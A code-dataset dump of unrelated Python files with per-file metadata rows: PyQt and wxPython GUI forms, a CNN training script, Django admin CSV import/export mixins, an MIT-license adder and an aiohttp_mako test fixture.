self.tb_produtos.verticalHeader().setVisible(False)
self.tb_produtos.verticalHeader().setDefaultSectionSize(50)
self.tb_produtos.verticalHeader().setMinimumSectionSize(20)
self.fr_botoes = QtWidgets.QFrame(Frame)
self.fr_botoes.setGeometry(QtCore.QRect(0, 330, 1051, 30))
self.fr_botoes.setStyleSheet("background:#E1DFE0;\n"
"border: none;")
self.fr_botoes.setObjectName("fr_botoes")
self.bt_selecionar = QtWidgets.QPushButton(self.fr_botoes)
self.bt_selecionar.setGeometry(QtCore.QRect(930, 0, 120, 30))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.bt_selecionar.setFont(font)
self.bt_selecionar.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.bt_selecionar.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_selecionar.setContextMenuPolicy(QtCore.Qt.ActionsContextMenu)
self.bt_selecionar.setStyleSheet("QPushButton {\n"
"background-color: #1E87F0;\n"
"color: #FFF\n"
" }\n"
"QPushButton:hover{\n"
"background-color: #40a286\n"
"}")
self.bt_selecionar.setIconSize(QtCore.QSize(75, 35))
self.bt_selecionar.setObjectName("bt_selecionar")
self.bt_refresh = QtWidgets.QPushButton(Frame)
self.bt_refresh.setGeometry(QtCore.QRect(1010, 60, 30, 31))
font = QtGui.QFont()
font.setFamily("Arial")
self.bt_refresh.setFont(font)
self.bt_refresh.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.bt_refresh.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_refresh.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.bt_refresh.setText("")
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("Imagens/refresh.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.bt_refresh.setIcon(icon)
self.bt_refresh.setObjectName("bt_refresh")
self.tx_busca = QtWidgets.QLineEdit(Frame)
self.tx_busca.setGeometry(QtCore.QRect(190, 60, 791, 31))
font = QtGui.QFont()
font.setFamily("Arial")
self.tx_busca.setFont(font)
self.tx_busca.setFocusPolicy(QtCore.Qt.ClickFocus)
self.tx_busca.setStyleSheet("QLineEdit {\n"
"color: #000\n"
"}\n"
"")
self.tx_busca.setObjectName("tx_busca")
self.cb_produtos = QtWidgets.QComboBox(Frame)
self.cb_produtos.setGeometry(QtCore.QRect(10, 60, 171, 31))
self.cb_produtos.setFocusPolicy(QtCore.Qt.StrongFocus)
self.cb_produtos.setStyleSheet("QComboBox{\n"
"background: #fff;\n"
"color: #000;\n"
"font: 13px \"Arial\" ;\n"
"text-transform: uppercase\n"
"}\n"
"QComboBox:Focus {\n"
"border: 1px solid red;\n"
"}\n"
" QComboBox::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 25px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QComboBox::down-arrow {\n"
" image: url(\"Imagens/down.png\");\n"
" }\n"
"")
self.cb_produtos.setObjectName("cb_produtos")
self.cb_produtos.addItem("")
self.bt_busca = QtWidgets.QPushButton(Frame)
self.bt_busca.setGeometry(QtCore.QRect(980, 60, 30, 31))
font = QtGui.QFont()
font.setFamily("Arial")
self.bt_busca.setFont(font)
self.bt_busca.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.bt_busca.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_busca.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.bt_busca.setText("")
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("Imagens/search.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.bt_busca.setIcon(icon1)
self.bt_busca.setObjectName("bt_busca")
self.retranslateUi(Frame)
QtCore.QMetaObject.connectSlotsByName(Frame)
def retranslateUi(self, Frame):
_translate = QtCore.QCoreApplication.translate
Frame.setWindowTitle(_translate("Frame", "Lista de Produtos"))
self.lb_tituloClientes_2.setText(_translate("Frame", "PRODUTOS"))
self.bt_inserir.setText(_translate("Frame", "NOVO PRODUTO"))
item = self.tb_produtos.verticalHeaderItem(0)
item.setText(_translate("Frame", "1"))
item = self.tb_produtos.horizontalHeaderItem(0)
item.setText(_translate("Frame", "ID"))
item = self.tb_produtos.horizontalHeaderItem(1)
item.setText(_translate("Frame", "CODIGO DE BARRAS"))
item = self.tb_produtos.horizontalHeaderItem(2)
item.setText(_translate("Frame", "ESTOQUE"))
item = self.tb_produtos.horizontalHeaderItem(3)
item.setText(_translate("Frame", "DESCRIÇÃO"))
item = self.tb_produtos.horizontalHeaderItem(4)
item.setText(_translate("Frame", "MARCA"))
item = self.tb_produtos.horizontalHeaderItem(5)
item.setText(_translate("Frame", "PREÇO"))
item = self.tb_produtos.horizontalHeaderItem(6)
item.setText(_translate("Frame", "FORNECEDOR"))
item = self.tb_produtos.horizontalHeaderItem(7)
item.setText(_translate("Frame", "CATEGORIA"))
self.bt_selecionar.setText(_translate("Frame", "SELECIONAR"))
self.bt_refresh.setToolTip(_translate("Frame", "ATUALIZAR TABELA"))
self.tx_busca.setPlaceholderText(_translate("Frame", "PROCURAR POR..."))
self.cb_produtos.setItemText(0, _translate("Frame", "SELECIONE"))
self.bt_busca.setToolTip(_translate("Frame", "BUSCAR"))
| 43.537815 | 102 | 0.687898 | 1,196 | 10,362 | 5.829431 | 0.2199 | 0.060241 | 0.082329 | 0.025818 | 0.3821 | 0.271084 | 0.203385 | 0.171543 | 0.075445 | 0.044177 | 0 | 0.027338 | 0.177475 | 10,362 | 237 | 103 | 43.721519 | 0.790684 | 0.018626 | 0 | 0.254464 | 1 | 0 | 0.16729 | 0.011317 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008929 | false | 0 | 0.004464 | 0 | 0.017857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1c62a23cf4d05075c2ce8fd742ceaebabdfcf8f | 7,826 | py | Python | zyc/zyc.py | Sizurka/zyc | 5ed4158617293a613b52cb6197ca601a1b491660 | [
"MIT"
] | null | null | null | zyc/zyc.py | Sizurka/zyc | 5ed4158617293a613b52cb6197ca601a1b491660 | [
"MIT"
] | null | null | null | zyc/zyc.py | Sizurka/zyc | 5ed4158617293a613b52cb6197ca601a1b491660 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# MIT license
#
# Copyright (C) 2019 by XESS Corp.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
GUI for finding/displaying parts and footprints.
"""
from __future__ import print_function
import os
import wx
from skidl import (
KICAD,
SchLib,
footprint_cache,
footprint_search_paths,
lib_search_paths,
skidl_cfg,
)
from .common import *
from .pckg_info import __version__
from .skidl_footprint_search import FootprintSearchPanel
from .skidl_part_search import PartSearchPanel
APP_TITLE = "zyc: SKiDL Part/Footprint Search"
APP_EXIT = 1
SHOW_HELP = 3
SHOW_ABOUT = 4
PART_SEARCH_PATH = 5
FOOTPRINT_SEARCH_PATH = 6
REFRESH = 7
class AppFrame(wx.Frame):
def __init__(self, *args, **kwargs):
        super(AppFrame, self).__init__(*args, **kwargs)
self.panel = PartFootprintSearchPanel(self)
box = wx.BoxSizer(wx.VERTICAL)
box.Add(self.panel, proportion=1, flag=wx.ALL | wx.EXPAND, border=SPACING)
self.SetSizer(box)
# Keep border same color as background of panel.
self.SetBackgroundColour(self.panel.GetBackgroundColour())
self.InitMenus()
self.SetTitle(APP_TITLE)
self.Center()
self.Show(True)
self.Fit()
def InitMenus(self):
# Top menu.
menuBar = wx.MenuBar()
# File submenu containing quit button.
fileMenu = wx.Menu()
menuBar.Append(fileMenu, "&File")
quitMenuItem = wx.MenuItem(fileMenu, APP_EXIT, "Quit\tCtrl+Q")
fileMenu.Append(quitMenuItem)
self.Bind(wx.EVT_MENU, self.OnQuit, id=APP_EXIT)
# Search submenu containing search and copy buttons.
srchMenu = wx.Menu()
menuBar.Append(srchMenu, "&Search")
partSrchPathItem = wx.MenuItem(
srchMenu, PART_SEARCH_PATH, "Set part search path...\tCtrl+P"
)
srchMenu.Append(partSrchPathItem)
self.Bind(wx.EVT_MENU, self.OnPartSearchPath, id=PART_SEARCH_PATH)
footprintSrchPathItem = wx.MenuItem(
srchMenu, FOOTPRINT_SEARCH_PATH, "Set footprint search path...\tCtrl+F"
)
srchMenu.Append(footprintSrchPathItem)
self.Bind(wx.EVT_MENU, self.OnFootprintSearchPath, id=FOOTPRINT_SEARCH_PATH)
refreshItem = wx.MenuItem(srchMenu, REFRESH, "Refresh part + footprint paths")
srchMenu.Append(refreshItem)
self.Bind(wx.EVT_MENU, self.OnRefresh, id=REFRESH)
# Help menu containing help and about buttons.
helpMenu = wx.Menu()
menuBar.Append(helpMenu, "&Help")
helpMenuItem = wx.MenuItem(helpMenu, SHOW_HELP, "Help\tCtrl+H")
helpMenu.Append(helpMenuItem)
aboutMenuItem = wx.MenuItem(helpMenu, SHOW_ABOUT, "About App\tCtrl+A")
helpMenu.Append(aboutMenuItem)
self.Bind(wx.EVT_MENU, self.ShowHelp, id=SHOW_HELP)
self.Bind(wx.EVT_MENU, self.ShowAbout, id=SHOW_ABOUT)
self.SetMenuBar(menuBar)
def OnPartSearchPath(self, event):
# Update search path for parts.
dlg = TextEntryDialog(
self,
title="Set Part Search Path",
caption="Part Search Path",
tip="Enter {sep}-separated list of directories in which to search for parts.".format(
sep=os.pathsep
),
)
dlg.Center()
dlg.SetValue(os.pathsep.join(lib_search_paths[KICAD]))
if dlg.ShowModal() == wx.ID_OK:
lib_search_paths[KICAD] = dlg.GetValue().split(os.pathsep)
skidl_cfg.store() # Stores updated lib search path in file.
dlg.Destroy()
def OnFootprintSearchPath(self, event):
# Update search path for footprints.
dlg = TextEntryDialog(
self,
title="Set Footprint Search Path",
caption="Footprint Search Path",
tip="Enter {sep}-separated list of directories in which to search for fp-lib-table file.".format(
sep=os.pathsep
),
)
dlg.Center()
dlg.SetValue(os.pathsep.join(footprint_search_paths[KICAD]))
if dlg.ShowModal() == wx.ID_OK:
footprint_search_paths[KICAD] = dlg.GetValue().split(os.pathsep)
skidl_cfg.store() # Stores updated search path in file.
dlg.Destroy()
def OnRefresh(self, event):
SchLib.reset()
footprint_cache.reset()
def ShowHelp(self, e):
Feedback(
"""
1. Enter keywords/regex in the part search box.
2. Matching parts will appear in the Library/Part table.
3. Select a row in the Library/Part table to display part info.
4. Enter keywords/regex in the footprint search box.
5. Matching footprints will appear in the Library/Footprint table.
6. Select a row in the Library/Footprint table to display the footprint.
7. a) Click the Copy button in the Part Search panel to copy
the part & footprint to the clipboard, -OR-
b) Click the Copy button in the Footprint Search panel to copy
the footprint to the clipboard, -OR-
c) Deselect (ctrl-click) the footprint row and click the
Copy button in the Part Search panel to copy just
the part to the clipboard.
8. Paste the clipboard contents into your SKiDL code.
General:
* Drag sashes to resize individual panels.
* Double-click column headers to sort table contents.
* Ctrl-click to select/deselect table cells.
""",
"Help",
)
def ShowAbout(self, e):
Feedback(
APP_TITLE + " " + __version__
+ """
(c) 2019 XESS Corp.
https://github.com/xesscorp/skidl
MIT License
""",
"About",
)
def OnQuit(self, e):
self.Close()
class PartFootprintSearchPanel(wx.SplitterWindow):
def __init__(self, *args, **kwargs):
    # Use the explicit class name (not self.__class__) so subclasses don't recurse.
    super(PartFootprintSearchPanel, self).__init__(*args, **kwargs)
# Subpanel for part search panel.
self.part_panel = add_border(
add_title(PartSearchPanel(self), "Part Search", wx.TOP), wx.BOTTOM
)
# self.part_panel = box_it(PartSearchPanel(self), "Part Search")
# Subpanel for footprint search.
self.footprint_panel = add_border(
add_title(FootprintSearchPanel(self), "Footprint Search", wx.TOP), wx.TOP
)
# self.footprint_panel = box_it(FootprintSearchPanel(self), "Footprint Search")
# Split subpanels top/bottom.
self.SplitHorizontally(self.part_panel, self.footprint_panel, sashPosition=0)
self.SetSashGravity(0.5) # Both subpanels expand/contract equally.
self.Update()
def main():
# import wx.lib.inspection
app = wx.App()
AppFrame(None)
# wx.lib.inspection.InspectionTool().Show()
app.MainLoop()
if __name__ == "__main__":
main()
| 32.882353 | 109 | 0.662663 | 985 | 7,826 | 5.153299 | 0.299492 | 0.047281 | 0.016548 | 0.015366 | 0.246651 | 0.184988 | 0.135934 | 0.124507 | 0.124507 | 0.110323 | 0 | 0.004565 | 0.244314 | 7,826 | 237 | 110 | 33.021097 | 0.853568 | 0.224508 | 0 | 0.164179 | 0 | 0 | 0.109073 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.059701 | null | null | 0.156716 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1c6e9a43d6622094c50a6e5fb6886a83b2efa97 | 516 | py | Python | train/ip.py | VCG/gp | cd106b604f8670a70add469d41180e34df3b1068 | [
"MIT"
] | null | null | null | train/ip.py | VCG/gp | cd106b604f8670a70add469d41180e34df3b1068 | [
"MIT"
] | null | null | null | train/ip.py | VCG/gp | cd106b604f8670a70add469d41180e34df3b1068 | [
"MIT"
] | null | null | null | import cPickle as pickle
import os; import sys; sys.path.append('..')
import gp
import gp.nets as nets
PATCH_PATH = ('iplb')
X_train, y_train, X_test, y_test = gp.Patch.load_rgb(PATCH_PATH)
X_train = X_train[:,:-1,:,:]
X_test = X_test[:,:-1,:,:]
cnn = nets.RGNetPlus()
cnn = cnn.fit(X_train, y_train)
test_accuracy = cnn.score(X_test, y_test)
print test_accuracy
# store CNN
sys.setrecursionlimit(1000000000)
with open(os.path.expanduser('~/Projects/gp/nets/IP_FULL.p'), 'wb') as f:
pickle.dump(cnn, f, -1)
| 21.5 | 73 | 0.705426 | 90 | 516 | 3.844444 | 0.422222 | 0.069364 | 0.040462 | 0.069364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028761 | 0.124031 | 516 | 23 | 74 | 22.434783 | 0.736726 | 0.017442 | 0 | 0 | 0 | 0 | 0.071287 | 0.055446 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.266667 | null | null | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1d3d2bbc91fe562ff03d1024258dfe9a2092f42 | 4,237 | py | Python | main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | [
"MIT"
] | 5 | 2020-02-07T23:24:05.000Z | 2021-07-23T23:37:41.000Z | main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | [
"MIT"
] | 11 | 2020-01-13T10:02:33.000Z | 2022-02-10T14:42:36.000Z | main/admin.py | japmeet01/fplmanager-website | c7a533f49acb04ee56876dff8759bb68468b0592 | [
"MIT"
] | 11 | 2020-02-07T23:24:09.000Z | 2020-10-16T14:57:54.000Z | from django.contrib import admin
from django.http import HttpResponse
from django.urls import path
from django.shortcuts import render, redirect
from django import forms
import os
import csv
from io import TextIOWrapper, StringIO
from .models import Player, Team, Usage, XgLookup
class CsvImportForm(forms.Form):
csv_file = forms.FileField()
class NoLoggingMixin:
def log_addition(self, *args):
return
def log_change(self, *args):
return
def log_deletion(self, *args):
return
class ExportCsvMixin:
def export_as_csv(self, request, queryset):
meta = self.model._meta
field_names = [field.name for field in meta.fields]
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
writer = csv.writer(response)
writer.writerow(field_names)
for obj in queryset:
    writer.writerow([getattr(obj, field) for field in field_names])
return response
def export_delete_as_csv(self, request, queryset):
meta = self.model._meta
field_names = [field.name for field in meta.fields]
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
writer = csv.writer(response)
writer.writerow(field_names)
for obj in queryset:
    writer.writerow([getattr(obj, field) for field in field_names])
    obj.delete()
return response
export_as_csv.short_description = "Export Selected"
export_delete_as_csv.short_description = "Export and Delete Selected"
class UploadCsvMixin:
def get_urls(self):
urls = super().get_urls()
my_urls = [
path('import-csv/', self.import_csv)
]
return my_urls + urls
def import_csv(self, request):
if request.method == 'POST':
csv_file = TextIOWrapper(request.FILES['csv_file'].file, encoding=request.encoding)
extension = os.path.splitext(request.FILES['csv_file'].name)[1]
if extension == '.csv':
reader = csv.reader(csv_file)
headers = next(reader)
model_fields = [m.name for m in self.model._meta.fields if m.name != 'updated']
# if set(headers) == set(model_fields):
input_data = [dict(zip(headers, row)) for row in reader]
for i in input_data:
t = self.model()
[setattr(t, k, v) for k, v in i.items()]
t.save()
# else:
# self.message_user(request, "Bad headers - unable to import selected file. Expected headers: '{expected}' Received headers: '{actual}'".format(
# expected=model_fields,
# actual=headers
# ), level='ERROR')
# return redirect("..")
else:
self.message_user(request, 'Incorrect file type', level='ERROR')
return redirect('..')
self.message_user(request, "Your csv file has been imported")
return redirect("..")
form = CsvImportForm()
payload = {"form": form}
return render(
request, "custom_admin/csv_form.html", payload
)
@admin.register(Player)
class PlayerAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
readonly_fields = ('updated',)
actions = ['export_as_csv']
@admin.register(Team)
class TeamAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
readonly_fields = ('updated',)
actions = ['export_as_csv']
@admin.register(Usage)
class UsageAdmin(NoLoggingMixin, ExportCsvMixin, admin.ModelAdmin):
readonly_fields = ('updated',)
actions = ['export_as_csv', 'export_delete_as_csv']
@admin.register(XgLookup)
class XgLookupAdmin(NoLoggingMixin, UploadCsvMixin, ExportCsvMixin, admin.ModelAdmin):
change_list_template = 'custom_admin/models_changelist.html'
readonly_fields = ('updated',)
actions = ['export_as_csv'] | 31.619403 | 164 | 0.618126 | 467 | 4,237 | 5.466809 | 0.271949 | 0.017626 | 0.025852 | 0.04387 | 0.406189 | 0.349001 | 0.349001 | 0.333725 | 0.333725 | 0.333725 | 0 | 0.000326 | 0.275903 | 4,237 | 134 | 165 | 31.619403 | 0.831812 | 0.068917 | 0 | 0.314607 | 0 | 0 | 0.105383 | 0.01549 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078652 | false | 0 | 0.157303 | 0.033708 | 0.539326 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a1e396a0fe0bfe84f4e348a5cd7eab9d9e2a1638 | 2,962 | py | Python | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | #!/usr/bin/python2
import tempfile
import sys
import datetime
mit_license = ("""\
/*
MIT License
Copyright (c) 2016 Paul Kramme
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
""")
class FileModifierError(Exception):
pass
class FileModifier(object):
def __init__(self, fname):
self.__write_dict = {}
self.__filename = fname
self.__tempfile = tempfile.TemporaryFile()
with open(fname, 'rb') as fp:
for line in fp:
self.__tempfile.write(line)
self.__tempfile.seek(0)
def write(self, s, line_number = 'END'):
if line_number != 'END' and not isinstance(line_number, (int, float)):
raise FileModifierError("Line number %s is not a valid number" % line_number)
try:
self.__write_dict[line_number].append(s)
except KeyError:
self.__write_dict[line_number] = [s]
def writeline(self, s, line_number = 'END'):
self.write('%s\n' % s, line_number)
def writelines(self, s, line_number = 'END'):
    for ln in s:
        self.writeline(ln, line_number)  # write each line, not the whole sequence
def __popline(self, index, fp):
try:
ilines = self.__write_dict.pop(index)
for line in ilines:
fp.write(line)
except KeyError:
pass
def close(self):
self.__exit__(None, None, None)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
with open(self.__filename,'w') as fp:
for index, line in enumerate(self.__tempfile.readlines()):
self.__popline(index, fp)
fp.write(line)
for index in sorted(self.__write_dict):
for line in self.__write_dict[index]:
fp.write(line)
self.__tempfile.close()
filename = sys.argv[1]
#license = sys.argv[1]
print "Licenseadder by Paul Kramme"
with FileModifier(filename) as fp:
fp.writeline(mit_license, 0)
| 32.911111 | 89 | 0.668467 | 402 | 2,962 | 4.766169 | 0.402985 | 0.057411 | 0.04071 | 0.023486 | 0.052192 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004041 | 0.248143 | 2,962 | 89 | 90 | 33.280899 | 0.856309 | 0.012829 | 0 | 0.126761 | 0 | 0 | 0.396304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.028169 | 0.042254 | null | null | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1efd6d129721046eb1d2381c5f7945eeeb81f90 | 431 | py | Python | tests/conftest.py | asvetlov/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 24 | 2016-12-25T16:24:45.000Z | 2020-04-07T14:39:28.000Z | tests/conftest.py | jettify/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 168 | 2016-11-12T20:50:34.000Z | 2022-03-18T02:09:08.000Z | tests/conftest.py | jettify/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 9 | 2016-12-13T10:48:26.000Z | 2020-09-17T10:42:40.000Z | import sys
import pytest
import aiohttp_mako
from aiohttp import web
@pytest.fixture
def app():
app = web.Application()
lookup = aiohttp_mako.setup(app, input_encoding='utf-8',
output_encoding='utf-8',
default_filters=['decode.utf8'])
tplt = "<html><body><h1>${head}</h1>${text}</body></html>"
lookup.put_string('tplt.html', tplt)
return app
| 22.684211 | 64 | 0.584687 | 52 | 431 | 4.730769 | 0.596154 | 0.089431 | 0.097561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015974 | 0.273782 | 431 | 18 | 65 | 23.944444 | 0.769968 | 0 | 0 | 0 | 0 | 0 | 0.183295 | 0.113689 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.307692 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a1fbde784a20640d80d64437aa8dd036428fff1c | 15,105 | py | Python | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | CCMtask/ccm.py | yyFFans/DemoPractises | e0e08413efc598489401c8370f4c7762b3493851 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ccm.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_CCMTask(object):
def setupUi(self, CCMTask):
CCMTask.setObjectName("CCMTask")
CCMTask.resize(712, 585)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(CCMTask.sizePolicy().hasHeightForWidth())
CCMTask.setSizePolicy(sizePolicy)
CCMTask.setAutoFillBackground(False)
self.centralwidget = QtWidgets.QWidget(CCMTask)
self.centralwidget.setObjectName("centralwidget")
self.issueBox = QtWidgets.QGroupBox(self.centralwidget)
self.issueBox.setGeometry(QtCore.QRect(10, 110, 691, 55))
self.issueBox.setObjectName("issueBox")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout(self.issueBox)
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.ARDTSEdit = QtWidgets.QLineEdit(self.issueBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.ARDTSEdit.sizePolicy().hasHeightForWidth())
self.ARDTSEdit.setSizePolicy(sizePolicy)
self.ARDTSEdit.setTabletTracking(True)
self.ARDTSEdit.setObjectName("ARDTSEdit")
self.horizontalLayout_3.addWidget(self.ARDTSEdit)
spacerItem = QtWidgets.QSpacerItem(70, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem)
self.issueInfoEdit = QtWidgets.QLineEdit(self.issueBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.issueInfoEdit.sizePolicy().hasHeightForWidth())
self.issueInfoEdit.setSizePolicy(sizePolicy)
self.issueInfoEdit.setTabletTracking(True)
self.issueInfoEdit.setObjectName("issueInfoEdit")
self.horizontalLayout_3.addWidget(self.issueInfoEdit)
self.label = QtWidgets.QLabel(self.issueBox)
self.label.setText("")
self.label.setObjectName("label")
self.horizontalLayout_3.addWidget(self.label)
self.issueDetailBox = QtWidgets.QGroupBox(self.centralwidget)
self.issueDetailBox.setGeometry(QtCore.QRect(10, 170, 691, 401))
self.issueDetailBox.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.issueDetailBox.setTabletTracking(True)
self.issueDetailBox.setObjectName("issueDetailBox")
self.deletedParamsBox = QtWidgets.QGroupBox(self.issueDetailBox)
self.deletedParamsBox.setGeometry(QtCore.QRect(500, 20, 161, 271))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.deletedParamsBox.sizePolicy().hasHeightForWidth())
self.deletedParamsBox.setSizePolicy(sizePolicy)
self.deletedParamsBox.setObjectName("deletedParamsBox")
self.deletedParamsEdit = QtWidgets.QTextEdit(self.deletedParamsBox)
self.deletedParamsEdit.setGeometry(QtCore.QRect(10, 20, 141, 231))
